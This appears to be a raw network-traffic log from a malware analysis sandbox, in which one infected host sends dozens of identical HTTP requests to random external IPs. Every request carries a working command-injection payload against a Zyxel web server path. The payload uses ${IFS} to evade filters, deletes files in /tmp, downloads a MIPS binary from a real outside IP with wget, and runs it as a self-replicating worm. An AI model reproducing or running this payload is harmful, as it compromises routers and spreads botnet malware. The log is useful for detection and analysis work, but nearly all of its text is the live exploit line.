                                        Mar 31, 2024 09:20:20.146837950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        525192.168.2.2356780115.48.124.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146886110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        526192.168.2.2342324145.159.240.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146936893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        527192.168.2.2343360124.86.38.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.146981001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        528192.168.2.233936283.56.168.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147017002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        529192.168.2.23577149.229.43.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147085905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        530192.168.2.234192462.12.190.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147128105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        531192.168.2.2335356180.68.238.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147156000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        532192.168.2.235513641.130.17.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147191048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        533192.168.2.235493853.104.41.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147248983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        534192.168.2.235805465.136.181.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147288084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        535192.168.2.23375909.171.152.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147316933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        536192.168.2.235650824.52.151.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147380114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        537192.168.2.235040447.245.40.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147416115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        538192.168.2.2342522107.2.43.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147469997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        539192.168.2.235951683.26.199.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147519112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        540192.168.2.234469060.39.168.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147567034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        541192.168.2.2358200154.254.129.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147623062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        542192.168.2.2343424177.52.72.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147675991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        543192.168.2.2355004205.61.5.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147736073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        544192.168.2.235826213.191.153.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147779942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        545192.168.2.2340770193.221.104.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147819996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        546192.168.2.2335616200.194.185.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147874117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        547192.168.2.2335588132.134.125.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147938967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        548192.168.2.2338688188.190.220.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.147975922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        549192.168.2.2348438206.93.203.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148032904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        550192.168.2.234574640.187.69.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148085117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        551192.168.2.2349558121.103.18.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148143053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        552192.168.2.2340838104.27.74.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148185015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        553192.168.2.2334800159.203.255.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148230076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        554192.168.2.2344264171.20.24.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148252010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        555192.168.2.2338146208.190.144.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148329973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        556192.168.2.235853660.61.55.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148382902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        557192.168.2.2355414106.89.69.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148423910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        558192.168.2.2349732192.140.97.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148458004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        559192.168.2.233931476.252.152.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148507118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        560192.168.2.235100225.183.190.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148541927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        561192.168.2.235539279.181.172.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148586988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        562192.168.2.2346856135.239.203.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148639917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        563192.168.2.235522868.83.7.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148680925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        564192.168.2.2338624163.212.152.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148756981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        565192.168.2.2342398176.199.80.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148782969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        566192.168.2.235688043.192.67.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148844957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        567192.168.2.2339230190.190.75.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148878098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        568192.168.2.234736087.158.62.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148945093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        569192.168.2.234087298.211.81.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.148993015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        570192.168.2.2358632149.59.89.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149035931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        571192.168.2.23570529.184.131.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149085999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        572192.168.2.2334656136.129.76.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149125099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        573192.168.2.234644469.4.35.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149188042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        574192.168.2.235432817.14.26.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149239063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        575192.168.2.2341270192.90.183.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149280071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        576192.168.2.2349582148.103.82.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149327040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        577192.168.2.2344460141.58.135.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149369955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        578192.168.2.2357060118.98.107.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149414062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        579192.168.2.235195820.27.6.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149487972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        580192.168.2.235482684.255.47.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149518967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        581192.168.2.234202845.121.29.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149563074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        582192.168.2.233503245.144.1.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149619102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        583192.168.2.233818879.180.17.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149666071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        584192.168.2.2345434182.63.202.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149724960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        585192.168.2.2333350144.18.253.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149755955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        586192.168.2.234170412.133.108.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149799109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        587192.168.2.2351536195.56.196.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149852037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        588192.168.2.2338406182.24.132.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149893045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        589192.168.2.2340116178.248.226.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149949074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        590192.168.2.235280492.213.166.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.149996996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        591192.168.2.235663823.56.205.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150038004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        592192.168.2.233491861.129.61.35443
                                        TimestampBytes transferredDirectionData
